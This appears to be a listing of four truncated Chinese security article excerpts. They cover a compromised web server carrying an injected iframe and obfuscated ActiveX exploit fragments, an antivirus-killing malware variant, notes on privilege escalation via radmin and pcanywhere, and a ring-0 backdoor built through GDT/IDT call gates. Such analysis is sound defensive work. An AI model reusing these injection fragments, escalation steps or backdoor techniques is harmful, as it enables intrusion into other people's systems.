[code] 1、 首先是发现浏览该服务器网页时，最底端加入了一段iframe： http://bh.jebooo.com/3002.htm 追查该代码，关键字： BD96C556-65A3-11D0-983A-00C04FC29 var real=new ActiveXObject("IERPCtl.IERPCtl.1"); var storm=new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"); var Lz=new ActiveXObject("GLC"+"HAT.G"+"LCh"+"atC"+"trl.1"); function GetCookie_cnzz(name) 应该是利用了ie的一些activex漏洞进行种木...

专业的人做专业的事情，弓虽病毒AV终结者又有了新的变种！而且似乎弓虽到了逆天！居然可以ring3级技术来删除AV软件的关键程序，汗颜。不过俗话说“魔高一尺，道高一丈”，金山的病毒专家铁军还是找到了对付的办法，下面演示给大家哈。 截获最新的AV终结者，该变种采用ring3级hook技术直接删除杀毒软件，劫持众多网站，阻止杀毒软件更新。专杀程序紧张制作中，测试通过会及时发布，老版本AV终结者专杀运行后会自动升级。 以下是详...

　好多都没有成功，还是发来看看，看看思路，呵呵 　　以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过的。本人不才，除了第一种方法自己研究的，其他的都是别人的经验总结。希望对朋友有帮助! 　　1.radmin连接法 　　条件是你权限够大，对方连防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去。本人从来米成功过。，端口到是给对方打开了。 　　2.pcanywhere 　...

任意用户模式下执行 ring 0 代码 Author : sinister Email : sinister@whitecell.org HomePage: http://www.whitecell.org 众所周知在非 Admin 用户模式下，是不允许加载驱动执行 ring 0 代码的。本文提供了一种方法，通过修改系统 GDT，IDT 来添加自己的CALLGATE 和INTGATE 这样便在系统中设置了一个后门。我们就可以利用这个后门在任意用户模式下执行 ring 0 代码了。为了保证我们添加的 CALLGATE 和 INTGATE 永久性。...